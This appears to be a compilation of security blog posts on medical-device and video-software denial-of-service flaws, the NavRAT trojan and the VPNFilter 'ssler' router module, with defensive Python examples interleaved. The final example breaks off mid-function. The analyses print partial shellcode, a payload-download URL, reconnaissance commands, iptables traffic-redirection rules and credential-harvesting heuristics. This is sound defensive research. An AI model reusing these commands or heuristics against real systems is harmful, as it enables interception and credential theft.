
Vulnerability Spotlight: Natus NeuroWorks Multiple Vulnerabilities

Vulnerabilities discovered by Cory Duplantis from Talos

Overview


In April 2018, Talos published 5 vulnerabilities in Natus NeuroWorks software. We have also identified 3 additional vulnerabilities. This software is used in the Natus Xltek EEG medical products from Natus Medical Inc. The vulnerable devices contain an Ethernet connection for data acquisition and connection to networks. The vulnerabilities described here can cause the affected service to crash, and they can be triggered remotely without authentication.

We strongly recommend that readers refer to the "Discussion" part of the previous article in order to clearly understand the risk of vulnerabilities targeting health devices. Natus has released Neuroworks 8.5 GMA3 to address these issues. Talos recommends installing this update as quickly as possible on affected systems.



Details


Denials of Service


TALOS-2017-0354 (CVE-2017-2853) - Natus Xltek EEG NeuroWorks ItemList Deserialization Denial of Service Vulnerability


Upon receiving data, the application attempts to deserialize it. It recognizes a variety of data types, two of which are a string and an itemlist. The header of the sent data contains the length of an itemlist; if an invalid length is sent, the application crashes, resulting in a denial of service.

More details can be found in the vulnerability report:

TALOS-2017-0354

TALOS-2017-0362 (CVE-2017-2858) - Natus Xltek EEG NeuroWorks ItemList Traversal Denial of Service Vulnerability


Similar to the previous vulnerability, the application attempts to deserialize data on receipt. If this data contains an empty itemlist, it causes an access violation, resulting in a denial of service in the application.

More details can be found in the vulnerability report:

TALOS-2017-0362

TALOS-2017-0364 (CVE-2017-2860) - Natus Xltek EEG NeuroWorks Invalid KeyTree Entry Denial of Service Vulnerability


NeuroWorks handles a specific data structure named KeyTree. A KeyTree is a list of lists. The application assumes that the first element of a KeyTree is an ItemList. However, if the first element is a String data structure, a pointer can point to an invalid memory address, resulting in a denial of service condition.

More details can be found in the vulnerability report:

TALOS-2017-0364
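The three reports above describe three checks a deserializer must make on attacker-controlled input: a declared length validated against the bytes actually received (TALOS-2017-0354), an empty list never traversed (TALOS-2017-0362), and an element's type verified before it is used as a list (TALOS-2017-0364). The following is an added example, not Natus code and not the NeuroWorks wire format: it parses a constructed, tagged, length-prefixed format (tag byte, 16-bit length or count, payload) that stands in for the real one, enforces all three checks, and turns each malformed input into a rejected message rather than a crash.

```python
import struct

# Constructed wire format for illustration only; it is NOT the Natus NeuroWorks
# protocol. Every item is: 1-byte tag, little-endian u16 length/count, payload.
TAG_STRING, TAG_ITEMLIST, TAG_KEYTREE = 0x01, 0x02, 0x03
MAX_ITEMS = 1024   # cap on declared counts so a hostile header cannot drive unbounded work
MAX_DEPTH = 16     # cap on nesting so recursion cannot exhaust the stack


class MalformedMessage(ValueError):
    """Structurally invalid input; the service answers with an error instead of crashing."""


def _take(buf, pos, n):
    """Slice n bytes at pos, but only after proving they lie inside the buffer."""
    if pos + n > len(buf):
        raise MalformedMessage(f"declared length {n} at offset {pos} exceeds {len(buf)}-byte buffer")
    return buf[pos:pos + n], pos + n


def parse_item(buf, pos=0, depth=0):
    """Parse one item at buf[pos] and return (value, next_pos)."""
    if depth > MAX_DEPTH:
        raise MalformedMessage("nesting too deep")
    hdr, pos = _take(buf, pos, 3)
    tag, length = hdr[0], struct.unpack("<H", hdr[1:3])[0]

    if tag == TAG_STRING:
        raw, pos = _take(buf, pos, length)   # bounds check before any copy (cf. TALOS-2017-0354)
        return ("String", raw.decode("ascii", "replace")), pos

    if length == 0:
        raise MalformedMessage("empty list")  # never traverse a zero-element list (cf. TALOS-2017-0362)
    if length > MAX_ITEMS:
        raise MalformedMessage(f"count {length} exceeds MAX_ITEMS")

    if tag == TAG_ITEMLIST:
        items = []
        for _ in range(length):
            item, pos = parse_item(buf, pos, depth + 1)
            items.append(item)
        return ("ItemList", items), pos

    if tag == TAG_KEYTREE:
        lists = []
        for _ in range(length):
            item, pos = parse_item(buf, pos, depth + 1)
            # A KeyTree is a list of lists: verify the element type instead of
            # assuming it (cf. TALOS-2017-0364, where a String in first position crashed).
            if item[0] != "ItemList":
                raise MalformedMessage(f"KeyTree element is {item[0]}, expected ItemList")
            lists.append(item)
        return ("KeyTree", lists), pos

    raise MalformedMessage(f"unknown tag {tag:#04x}")


def safe_parse(buf):
    """Boundary wrapper: returns ('ok', value) or ('rejected', reason), never an exception."""
    try:
        value, end = parse_item(buf)
        if end != len(buf):
            raise MalformedMessage(f"{len(buf) - end} trailing bytes")
        return ("ok", value)
    except MalformedMessage as exc:
        return ("rejected", str(exc))


# Encoders used only to build the constructed samples below.
def enc_string(s):
    return bytes([TAG_STRING]) + struct.pack("<H", len(s)) + s.encode()


def enc_list(tag, items):
    return bytes([tag]) + struct.pack("<H", len(items)) + b"".join(items)


SAMPLE_OK = enc_list(TAG_KEYTREE, [enc_list(TAG_ITEMLIST, [enc_string("id"), enc_string("42")])])
SAMPLE_BAD_LENGTH = bytes([TAG_STRING]) + struct.pack("<H", 500) + b"ab"  # header claims 500 bytes, 2 present
SAMPLE_EMPTY_LIST = enc_list(TAG_ITEMLIST, [])                              # zero-element ItemList
SAMPLE_STRING_FIRST = enc_list(TAG_KEYTREE, [enc_string("x")])             # KeyTree whose first element is a String

if __name__ == "__main__":
    for name, sample in [("ok", SAMPLE_OK), ("bad length", SAMPLE_BAD_LENGTH),
                         ("empty list", SAMPLE_EMPTY_LIST), ("string first", SAMPLE_STRING_FIRST)]:
        print(f"{name:13s} -> {safe_parse(sample)}")
```

Each rejection carries the offset and the declared value, which is what you want in a service log when a device on a clinical network starts receiving malformed frames.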

Tested Versions:


Natus Xltek NeuroWorks 8

Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change, pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules: 43150,43192


NavRAT Uses US-North Korea Summit As Decoy For Attacks In South Korea

This blog post is authored by Warren Mercer and Paul Rascagneres with contributions from Jungsoo An.

Executive Summary


Talos has discovered a new malicious Hangul Word Processor (HWP) document targeting Korean users. If a malicious document is opened, a remote access trojan that we're calling "NavRAT" is downloaded, which can perform various actions on the victim machine, including command execution, and has keylogging capabilities.

The decoy document is named "미북 정상회담 전망 및 대비.hwp" (Prospects for US-North Korea Summit.hwp). The HWP file format is mainly used in South Korea. An Encapsulated PostScript (EPS) object is embedded within the document in order to execute malicious shellcode on the victim systems. The purpose is to download and execute an additional payload hosted on a compromised website: NavRAT.

This is a classic RAT that can download, upload, execute commands on the victim host and, finally, perform keylogging. However, the command and control (C2) infrastructure is very specific. It uses the legitimate Naver email platform in order to communicate with the attackers via email. The uploaded file(s) are sent by email, and the downloaded files are retrieved from an email attachment. We have already observed malware using free email platforms for abuse, but this is the first time we have identified a malware that uses Naver — which is known for its popularity in South Korea.

One of the most interesting questions we still have is regarding attribution — and who is behind this malware. Previously, we published several articles concerning Group123 (here, here, here, here and here). We currently assess with medium confidence that this campaign and NavRAT are linked to Group123.



Malicious Document


Decoy Document


The attack starts with a spear-phishing email containing the HWP document named "미북 정상회담 전망 및 대비.hwp" (Prospects for US-North Korea Summit.hwp). This references a legitimate event that could potentially take place on June 12. Here is a screenshot of the document:



This document explains concerns prior to the summit between the U.S. and North Korea, which is expected to focus on the topic of denuclearization. The summit is the latest in a line of signs of diplomatic outreach from North Korea, following the Panmunjom Declaration for Peace, Prosperity and Unification of the Korean Peninsula between South Korea and North Korea on April 27, 2018.


This document contains the aforementioned EPS object. This object is used to execute malicious shellcode on the system. This is a seemingly common vector for attackers when using HWP documents, which we have previously encountered and described.

Malicious Code


As we already mentioned in our previous articles concerning malicious documents, EPS is effective from an attacker's point of view. It is a powerful, stack-based scripting language, and in malicious use cases, can be abused to obtain additional payloads. Here is the content of the file:

/shellcode <90909090909090909090E800<...redacted…>4D2D6DC95CBD5DC1811111111111111> def
<7B0D0A2756...redacted…>312067657420636C6F736566696C650D0A717569740D0A7D>
token pop exch pop
Exec


The executed shellcode will first perform a decoding routine designed to download an additional payload from the internet. In our case, the file URI was:


hxxp://artndesign2[.]cafe24[.]com:80/skin_board/s_build_cafeblog/exp_include/img.png


This website is a legitimate Korean website. We assume that this website was compromised in order to deliver the final payload on the targeted systems. This is a method we have previously observed with attacks focusing on the Korean peninsula.

The image is downloaded directly, and the shellcode is loaded and executed in memory. This is an example of fileless execution by only running malicious processes within the memory of the victim host. The purpose is to drop and execute a decoded executable using the following path:

%APPDATA%\Local\Temp\~emp.exe

Once executed, NavRAT will immediately leverage cmd.exe to perform a systeminfo and a tasklist check on the system it is running on while writing the output to a TMP file, once again attempting to hide within an AhnLab folder. Interestingly, the attacker has used the >> method to append to the file so there can be multiple outputs written to their single TMP file:

"C:\Windows\system32\cmd.exe" /C systeminfo >> "C:\Ahnlab\$$$A24F.TMP"

"C:\WINDOWS\system32\cmd.exe" /C tasklist /v >> "C:\Ahnlab\$$$A24F.TMP"

NavRAT


Capabilities


NavRAT is a remote access trojan (RAT) designed to upload, download and execute files. The analysed sample contains many verbose logs: the malware's author logs every action to an (encoded) file. It is not often that we are able to use the attacker's own logging capability to facilitate analysis, and it made our research easier.



This screenshot shows the log messages written during process injection, including the APIs used.

NavRAT starts by copying itself (~emp.exe) to the %ProgramData%\Ahnlab\GoogleUpdate.exe path. It uses the path of a well-known security company located in South Korea named AhnLab. NavRAT then creates a registry key in order to execute this file copy at the next reboot of the system, an initial method of persistence. The log files mentioned previously are stored in the same directory as NavRAT on the victim machine, again making it easy for us to find and analyse the additional log files.
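The two cmd.exe command lines, the fake AhnLab folder and the GoogleUpdate.exe copy under %ProgramData%\Ahnlab\ are concrete host-level observables. The following is an added example, not code from the original post, of a small detection routine run over constructed Sysmon-style process-creation events (the field names, the user profile paths and the benign look-alike events are assumptions); it flags the recon-to-TMP pattern, the mislocated updater, and the ~emp.exe dropper while leaving the real Google updater and an administrator's one-off systeminfo alone.

```python
import re

# Constructed process-creation events in a simplified Sysmon-like shape (image, cmdline,
# parent). They are not telemetry from the post; events 0-2 mimic the behaviour described
# above, events 3-4 are benign look-alikes the rules must not flag.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\Windows\system32\cmd.exe" /C systeminfo >> "C:\Ahnlab\$$$A24F.TMP"',
     "parent": r"C:\Users\victim\AppData\Local\Temp\~emp.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'"C:\WINDOWS\system32\cmd.exe" /C tasklist /v >> "C:\Ahnlab\$$$A24F.TMP"',
     "parent": r"C:\Users\victim\AppData\Local\Temp\~emp.exe"},
    {"image": r"C:\ProgramData\Ahnlab\GoogleUpdate.exe",
     "cmdline": r'"C:\ProgramData\Ahnlab\GoogleUpdate.exe"',
     "parent": r"C:\Windows\explorer.exe"},
    {"image": r"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe",   # the real updater's location
     "cmdline": r'"C:\Program Files (x86)\Google\Update\GoogleUpdate.exe" /c',
     "parent": r"C:\Windows\System32\services.exe"},
    {"image": r"C:\Windows\System32\cmd.exe",                                # an admin's one-off recon
     "cmdline": r'"C:\Windows\system32\cmd.exe" /C systeminfo > C:\Users\admin\info.txt',
     "parent": r"C:\Windows\explorer.exe"},
]

# Rule 1: cmd.exe runs systeminfo or tasklist and appends (>>) the output to a .TMP file
# in a folder named Ahnlab, the exact pattern in the two command lines above.
RECON_TO_AHNLAB_TMP = re.compile(
    r'cmd\.exe.*?/C\s+(systeminfo|tasklist)\b.*?>>\s*"?[A-Za-z]:\\Ahnlab\\[^"\s]+\.TMP"?',
    re.IGNORECASE)
# Rule 2: GoogleUpdate.exe executing from ProgramData\Ahnlab instead of a Google Update directory.
FAKE_UPDATER = re.compile(r'\\ProgramData\\Ahnlab\\GoogleUpdate\.exe$', re.IGNORECASE)
# Rule 3: the ~emp.exe dropper in the user's Temp directory, as the image or as the parent.
TEMP_DROPPER = re.compile(r'\\AppData\\Local\\Temp\\~emp\.exe$', re.IGNORECASE)


def classify(event):
    """Return the list of rule names an event matches (empty list for benign events)."""
    hits = []
    if RECON_TO_AHNLAB_TMP.search(event.get("cmdline", "")):
        hits.append("recon_appended_to_ahnlab_tmp")
    if FAKE_UPDATER.search(event.get("image", "")):
        hits.append("googleupdate_in_programdata_ahnlab")
    if TEMP_DROPPER.search(event.get("image", "")) or TEMP_DROPPER.search(event.get("parent", "")):
        hits.append("temp_emp_exe_dropper")
    return hits


def scan(events):
    """Return [(event_index, [rule, ...]), ...] for every event that matched at least one rule."""
    findings = []
    for index, event in enumerate(events):
        hits = classify(event)
        if hits:
            findings.append((index, hits))
    return findings


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_EVENTS):
        print(f"event {index}: {', '.join(hits)}")
```

Rule 2 is the most durable of the three: a binary named after a well-known updater but living under ProgramData\Ahnlab has no legitimate reason to exist, whereas the recon command lines could be renamed by a later build.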

NavRAT has support for process injection. Using this method, it copies itself into a running Internet Explorer process in order to avoid detection by running as an independent process. The malware is able to record the keystrokes on the targeted user's system:


The most interesting part of this RAT is the C2 server architecture. The malware uses the Naver email platform in order to communicate with the operators.

Command & Control


The malware uses the Naver email platform to communicate with the operator. The credentials are hardcoded in the sample:



However, during our investigation, NavRAT was unable to communicate with the email address:

[05/30/2018, 17:39:45]  NaverUpload Start!!
[05/30/2018, 17:39:46] NaverUpload :PreUploading success
[05/30/2018, 17:39:46] uploading step-1 : HttpSendRequest failed. Err[12150]
[05/30/2018, 17:39:46] ////////////// Response Headers getting failure //////////
[05/30/2018, 17:39:46] NaverUpload :Uploading failed. Try[0]
[05/30/2018, 17:39:47] uploading step-1 : HttpSendRequest failed. Err[12150]
[05/30/2018, 17:39:47] ////////////// Response Headers getting failure //////////
[05/30/2018, 17:39:47] NaverUpload :Uploading failed. Try[1]
[05/30/2018, 17:39:48] uploading step-1 : HttpSendRequest failed. Err[12150]
[05/30/2018, 17:39:48] ////////////// Response Headers getting failure //////////
[05/30/2018, 17:39:48] NaverUpload :Uploading failed. Try[2]
[05/30/2018, 17:39:49] uploading step-1 : HttpSendRequest failed. Err[12150]
[05/30/2018, 17:39:49] ////////////// Response Headers getting failure //////////
[05/30/2018, 17:39:49] NaverUpload :Uploading failed. Try[3]
[05/30/2018, 17:39:51] uploading step-1 : HttpSendRequest failed. Err[12150]
[05/30/2018, 17:39:51] ////////////// Response Headers getting failure //////////
[05/30/2018, 17:39:51] NaverUpload :Uploading failed. Try[4]
[05/30/2018, 17:39:52] UploadProc : UploadFile Err
[05/30/2018, 17:39:52] PreCommProc : UploadProc failed

The broken communication was due to protection implemented by Naver. The malware was presumably executed from too many different countries, and the account is currently locked:




The password must be reset by providing information on the account, or with a mobile phone of the owner (the phone number is located in the UK). In its current status, NavRAT cannot work correctly. We assume that the owner of the malware didn't know that Naver implemented this protection.

NavRAT is able to download and execute files located in the attachment of a received email. It is able to remove emails, and finally, it is able to send an email via the Naver account. In our sample, the malware attempts to send the data to: chioekang59@daum[.]net.



Archeology


During our investigation, we tried to find additional samples of NavRAT. We only identified one old sample compiled in May 2016. As in our case, this old sample used a fake AhnLab directory to store log files (C:\AhnLab\). In this version, the compilation path was not removed:

N:\CodeProject\VC_Code Project\Attack_Spy\mailacounts.com\src_total_20160430 - v10.0(DIV)\bin\PrecomExe(Win32).pdb

We can conclude that NavRAT has probably existed since 2016 — which we believe to be version 10 at the time. The attacker(s) appear to have remained under the radar for several years. We assume this malware has been sparingly used and only for very specific targets.

Group123 Links?


As we explore the Korean malware landscape, we always have burning questions relating to any possible links with Group123. We identified some relevant points which, based on previous TTPs used by this group, we believe with medium confidence suggest the involvement of Group123.

The modus operandi is identical to previous Group123 campaigns — an HWP document with an embedded EPS object containing malicious shellcode. The shellcode of the embedded object is designed to download an image, which is, in fact, a new shellcode used to decode an embedded executable. We saw this exact same methodology used by Group123 during previous attacks. One such example is ROKRAT, another remote access trojan we discovered in April 2017 that targeted the Korean peninsula.

The shellcode used in the EPS object is not exactly the same, but it contains a lot of similarities, right down to the number of instructions used, the number of NOP (no operation) instructions and an almost identical command layout. (On the left is NavRAT, and on the right is the shellcode of ROKRAT):



We performed the same analysis on the shellcode located in the downloaded image file; that shellcode is not exactly the same either, but the design is very similar.

Additionally, we can add the victimology and the use of a public cloud platform as the C2 server. The attackers have simply moved from Yandex, pCloud, MediaFire and Twitter to Naver. This platform is mainly used locally in South Korea, so a connection to it cannot be identified as malicious activity: the malicious traffic is hidden in the global flow.

Due to all these elements, we assess with medium confidence that NavRAT and this campaign can be linked to Group123. The malware developer is probably a different person within Group123's working team, but the infection framework and the operating mode are the same. When Talos published on Olympic Destroyer, we were able to see a lot of false flags being used. With NavRAT, we do not see this kind of intentional, non-obvious IOC/false-flag scenario designed to point attribution at another entity. Because NavRAT lacks these non-obvious false flags, we do not believe it to be related to non-Group123 actors.

Conclusion


South Korea is still, and always will remain, an attractive target for advanced actors. The region has geopolitical interests that arise from the segregations that exist between the secretive North Korea and the more open South Korea. In this campaign, the attackers used a classical HWP document in order to download and execute a previously unknown malware: NavRAT. The author used real events in order to forge the decoy document, choosing the U.S. - North Korea Summit to entice the targets to open it.

The approach is close to the techniques used by Group123 attacks we have observed and written about over the past 18 months or so: the shellcode contains similarities, the final payload is malicious shellcode located in an image hosted on a compromised website, and the author uses an open platform as the C2 server. In this case, NavRAT used an email provider, Naver, while ROKRAT previously used cloud providers. And finally, the victimology and the targeted region are the same. All these elements are not strict proof of a link between NavRAT and ROKRAT. However, we assess with medium confidence that NavRAT is linked to Group123.

Using well-known local cloud/email providers is smart from an attacker's point of view. It's really hard to identify the malicious traffic in the middle of the legitimate traffic. In this case, the email provider locked the account due to attempts from too many different countries to access the email inbox. We identified the sample on several public sandbox systems, and we assume the multiple connection attempts were performed by these sandboxes.

Coverage


Additional ways our customers can detect and block this threat are listed below.



Advanced Malware Protection (AMP) is ideally suited to prevent the execution of the malware used by these threat actors.

CWS or WSA web scanning prevents access to malicious websites and detects malware used in these attacks.

Email Security can block malicious emails sent by threat actors as part of their campaign.

Network Security appliances such as NGFW, NGIPS, and Meraki MX can detect malicious activity associated with this threat.

AMP Threat Grid helps identify malicious binaries and build protection into all Cisco Security products.

Umbrella, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.

Open-source Snort subscriber rule set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

IOCs


Malicious HWP: e5f191531bc1c674ea74f8885449f4d934d5f1aa7fd3aaa283fe70f9402b9574

NavRAT: 4f06eaed3dd67ce31e7c8258741cf727964bd271c3590ded828ad7ba8d04ee57

Online Payload: hxxp://artndesign2[.]cafe24[.]com:80/skin_board/s_build_cafeblog/exp_include/img.png


2016 NavRAT sample:

e0257d187be69b9bee0a731437bf050d56d213b50a6fd29dd6664e7969f286ef

Vulnerability Spotlight: TALOS-2018-0535 - Ocularis Recorder VMS_VA Denial of Service Vulnerability

Vulnerabilities discovered by Carlos Pacho from Talos


Overview

Talos is disclosing a denial-of-service vulnerability in the Ocularis Recorder. Ocularis is a video management software (VMS) platform used in a variety of settings, from convenience stores to city-wide deployments. An attacker can trigger this vulnerability by crafting a malicious network packet that causes a process to terminate, resulting in a denial of service.

Details

An exploitable denial-of-service vulnerability exists in the Ocularis Recorder functionality of Ocularis 5.5.0.242. A specially crafted TCP packet can cause a process to terminate, resulting in denial of service.

The VMS_VA server process listens for incoming TCP connections on a port in the range 60801-65535. When a client connects and sends any unexpected data, the binary responds with "Hello World!" The binary checks whether the received data starts with "dispose." If it does, the server process kills itself. No authentication is required for this command to go through, so any attacker with network access to the server application can use it to perform a denial-of-service attack.

Ocularis has released patches for versions 5.3, 5.4 and 5.5 (https://onssi.com/software-downloads/).

More technical details can be found in the Talos Vulnerability Reports.

Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rule: 45829

Talos Threat Research Summit Guide and Cisco Live Preview


The first Cisco Talos Threat Research Summit is coming up at Cisco Live! in Orlando, so we are providing a quick guide to all the activities going on at the summit and beyond. The response to the summit was stronger than we could have anticipated for the first year - it sold out fast!  Next time, we definitely need a bigger boat. Whether or not you have a ticket to the summit, read on for a guide of how to stay on top of what's happening in Orlando, and how you can connect with the events Talos is holding around Cisco Live! 2018.

Talos Threat Research Summit (Sold Out!)

Sunday, June 10, 7 a.m. - 7:30 p.m. ET


The Talos Threat Research Summit is designed by defenders, for defenders. It is focused on practical defensive security research and techniques. The emphasis is strongly on giving defenders actionable information, tactics, and intel they can take back to their organization and put to work immediately. In the modern threat landscape, better defense is no longer a wish-list item. Attacks are no longer "if" but "when," and in some environments, "how many times today?" The content selected for the Talos Threat Research Summit was curated to not only bolster knowledge but to facilitate opportunities for defenders to build relationships with their peers, which can be a defender's most powerful resource.

Agenda and Session Info

Agenda and speakers are available on the Talos Threat Research Summit event page (cs.co/TTRS18).

Social Channels

You will find highlights, quotes, and other content being tweeted directly from the summit across @TalosSecurity, @CiscoSecurity, and other Twitter accounts. Follow the #TTRS and #CLUS hashtags to catch all the conversation. Sessions will not be streamed, but content will be made available to attendees on the Cisco Live! content portal.

Reception

After the Talos Threat Research Summit, attendees will have the opportunity to network with each other and Talos team members in attendance.


Cisco Live Session - Talos Insights: The State of Cyber Security (BRKSEC-2010)

Thursday, June 14, 1 - 2:30 p.m. ET

Craig Williams, Director Talos Outreach, Cisco — Distinguished Speaker


Cisco Talos specializes in early-warning intelligence and threat analysis necessary for maintaining a secure network. People responsible for defending networks realize that the security threat landscape is constantly in flux as attackers evolve their skills. Talos advances the overall efficacy of all Cisco security platforms by aggregating data, cooperating with teams of security experts, and applying the cutting-edge big data technology to security. In this talk, we will perform a deep analysis of recent threats and see how Talos leverages large datasets to deliver improvements to products and mitigation strategies.

Beers with Talos @Live!

Tuesday, June 12, 4 - 6 p.m. ET


Join us at the CiscoTV set on the second floor balcony overlooking the main entrance and conference hall. We will be recording a special session of the Beers with Talos podcast, and you can watch us go without the benefit of editing! Stop by while the crew is recording - the first person to hit Craig with Snorty wins a T-shirt!

Other Fun Stuff at Cisco Live!

The Hunting Game

Monday, June 11 - Thursday, June 14, all day


The Hunting Game debuted at Cisco Live! Melbourne earlier this year and it was a big hit. Players are in the role of incident responders. Using Cisco kit and old-fashioned logic, they have one hour to assess and respond to the incident and to prevent future attacks. The game is designed for beginners and pros alike. For info and locations, see the Hunting Game post on the Cisco Security blog.

VPNFilter Update - VPNFilter exploits endpoints, targets new devices





Introduction



Cisco Talos, while working with our various intelligence partners, has discovered additional details regarding "VPNFilter." In the days since we first published our findings on the campaign, we have seen that VPNFilter is targeting more makes/models of devices than initially thought, and has additional capabilities, including the ability to deliver exploits to endpoints. Talos recently published a blog about a broad campaign that delivered VPNFilter to small home-office network devices, as well as network-attached storage devices. As we stated in that post, our research into this threat was, and is, ongoing. In the wake of that post, we have had a number of partners step forward with additional information that has assisted us in our work. This post is an update of our findings over the past week.

First, we have determined that additional devices are being targeted by this actor, including some from vendors that are new to the target list. These new vendors are ASUS, D-Link, Huawei, Ubiquiti, UPVEL, and ZTE. New devices were also discovered from Linksys, MikroTik, Netgear, and TP-Link. Our research currently shows that no Cisco network devices are affected. We've provided an updated device list below.

We have also discovered a new stage 3 module that injects malicious content into web traffic as it passes through a network device. At the time of our initial posting, we did not have all of the information regarding the suspected stage 3 modules. The new module allows the actor to deliver exploits to endpoints via a man-in-the-middle capability (e.g. they can intercept network traffic and inject malicious code into it without the user's knowledge). With this new finding, we can confirm that the threat goes beyond what the actor could do on the network device itself, and extends the threat into the networks that a compromised network device supports. We provide technical details on this module, named "ssler" below.

Additionally, we have discovered another stage 3 module that gives any stage 2 module lacking the kill command the capability to disable the device. When executed, this module specifically removes traces of the VPNFilter malware from the device and then renders the device unusable. Analysis of this module, called "dstr," is also provided below.

Finally, we've conducted further research into the stage 3 packet sniffer, including in-depth analysis of how it looks for Modbus traffic.

Technical details

New third-stage modules



'ssler' (Endpoint exploitation module — JavaScript injection)

The ssler module, which we pronounce as "Esler," provides data exfiltration and JavaScript injection capabilities by intercepting all traffic passing through the device destined for port 80. This module is expected to be executed with a parameter list, which determines the module's behavior and which websites should be targeted. The first positional parameter controls the folder on the device where stolen data should be stored. The purposes of the other named parameters are as follows:

  • dst: — Used by the iptables rules created to specify a destination IP address or CIDR range that the rule should apply to.
  • src: — Used by the iptables rules created to specify a source IP address or CIDR range that the rule should apply to.
  • dump: — Any domain passed in a dump parameter will have all of its HTTP headers recorded in the reps_*.bin file.
  • site: — When a domain is provided in the "site" parameter, this domain will have its web pages targeted for JavaScript injection.
  • hook: — This parameter determines the URL of the JavaScript file for injection.


The first action taken by the ssler module is to configure the device's iptables to redirect all traffic destined for port 80 to its local service listening on port 8888. It starts by using the insmod command to insert three iptables modules into the kernel (ip_tables.ko, iptable_filter.ko, iptable_nat.ko) and then executes the following shell commands:

  • iptables -I INPUT -p tcp --dport 8888 -j ACCEPT
  • iptables -t nat -I PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 8888
  • Example: ./ssler logs src:192.168.201.0/24 dst:10.0.0.0/16 results in the NAT rule:
    -A PREROUTING -s 192.168.201.0/24 -d 10.0.0.0/16 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8888

Note: To ensure that these rules do not get removed, ssler deletes them and then adds them back approximately every four minutes.
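Because ssler re-installs its NAT rules every few minutes, a one-off listing of the nat table on a device with a shell is enough to catch it. The following is an added example, not code from the report or from the VPNFilter analysis tooling: it parses constructed `iptables -t nat -S` output (the benign DNAT port-forward and the interface names are assumptions) and returns every PREROUTING rule that REDIRECTs web traffic to a local port, which is the shape of the two rules shown above.

```python
import shlex

# Constructed `iptables -t nat -S` output, not captured from a real device. The two
# REDIRECT rules mirror the ones the ssler module installs; the DNAT rule stands in for a
# benign port-forward an administrator might have configured themselves.
SAMPLE_NAT_RULES = """\
-P PREROUTING ACCEPT
-P INPUT ACCEPT
-P OUTPUT ACCEPT
-P POSTROUTING ACCEPT
-A PREROUTING -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8888
-A PREROUTING -s 192.168.201.0/24 -d 10.0.0.0/16 -p tcp -m tcp --dport 80 -j REDIRECT --to-ports 8888
-A PREROUTING -i eth0 -p tcp -m tcp --dport 2222 -j DNAT --to-destination 192.168.1.10:22
-A POSTROUTING -o eth0 -j MASQUERADE
"""


def parse_rule(line):
    """Turn one `-A` line into a dict of the options we care about; None for policy/other lines."""
    argv = shlex.split(line)
    if len(argv) < 2 or argv[0] != "-A":
        return None
    rule = {"chain": argv[1], "src": None, "dst": None, "dport": None, "target": None, "to_ports": None}
    i = 2
    while i < len(argv):
        opt = argv[i]
        # An option consumes the next token as its value unless that token is itself an option.
        if i + 1 < len(argv) and not argv[i + 1].startswith("-"):
            val, step = argv[i + 1], 2
        else:
            val, step = None, 1
        if opt == "-s":
            rule["src"] = val
        elif opt == "-d":
            rule["dst"] = val
        elif opt == "--dport":
            rule["dport"] = int(val) if val and val.isdigit() else val
        elif opt == "-j":
            rule["target"] = val
        elif opt in ("--to-ports", "--to-port"):
            rule["to_ports"] = val
        i += step
    return rule


def find_web_redirects(rules_text, web_ports=(80, 443)):
    """Return PREROUTING rules that REDIRECT web traffic to a local port: the pattern ssler installs."""
    hits = []
    for line in rules_text.splitlines():
        rule = parse_rule(line)
        if rule and rule["chain"] == "PREROUTING" and rule["target"] == "REDIRECT" \
                and rule["dport"] in web_ports:
            hits.append(rule)
    return hits


if __name__ == "__main__":
    for hit in find_web_redirects(SAMPLE_NAT_RULES):
        scope = f"{hit['src'] or 'any'} -> {hit['dst'] or 'any'}"
        print(f"port {hit['dport']} redirected to local port {hit['to_ports']} for {scope}")
```

A hit is a finding to review, not proof on its own: captive portals and transparent proxies install the same kind of rule deliberately. What makes it suspicious here is a redirect the administrator did not configure, on a consumer router, pointing at a port (8888) that nothing legitimate should be listening on.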

Any outgoing web requests on port 80 are now intercepted by ssler and can be inspected and manipulated before being sent to the legitimate HTTP service. All HTTP requests are sslstripped. That is, the following changes are made to requests before being sent to the true HTTP server:

  • Any instances of the string https:// are replaced with http://, converting requests for secure HTTP resources to requests for insecure ones so sensitive data such as credentials can be extracted from them.
  • If the request contains the header Connection: keep-alive, it is replaced with Connection: close
  • If the request contains the header Accept-Encoding with the gzip value, this is converted to Accept-Encoding: plaintext/none so no responses will be compressed with gzip (exceptions are made for certain file types, such as images).


If the host is in one of the dump: parameters, the details of the request are saved to the disk for exfiltration, including the URL, port and all of the request headers. If the host is not in a dump: parameter, it will only dump requests with an Authorization header or URLs that have credentials in them. URLs are determined to have credentials if they contain either the string assword= or ass= and one of the following strings in them:

  • sername=
  • ser=
  • ame=
  • ogin=
  • ail=
  • hone=
  • session%5Busername
  • session%5Bpassword
  • session[password


Any POST requests to accounts.google.com containing the string signin will also be dumped.
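A defender can turn the rules above into an exposure check: any request that reaches a compromised router as plain HTTP and matches them is written to the dump file. The following is an added example, not code from the report, that encodes the decision exactly as described above (the constructed requests, the case-insensitive header handling and the substring match for dump: hosts are assumptions) so an application owner can test their own URLs against it.

```python
# Fragments quoted above from the ssler analysis: a URL is treated as carrying credentials
# when it contains "assword=" or "ass=" together with one of these.
USER_MARKERS = ("sername=", "ser=", "ame=", "ogin=", "ail=", "hone=",
                "session%5Busername", "session%5Bpassword", "session[password")


def url_has_credentials(url):
    """ssler's substring heuristic for credential-bearing URLs."""
    return ("assword=" in url or "ass=" in url) and any(m in url for m in USER_MARKERS)


def dump_reason(method, host, path, headers, body="", dump_hosts=()):
    """Why ssler would record this plain-HTTP request, or None if it would pass unrecorded.

    `headers` is a dict; names are compared case-insensitively (an assumption about the module).
    `dump_hosts` stands in for the dump: parameters, matched here on substring (also an assumption).
    """
    if any(d in host for d in dump_hosts):
        return "host matches a dump: parameter"
    if any(name.lower() == "authorization" for name in headers):
        return "Authorization header present"
    if url_has_credentials(path):
        return "credentials in URL"
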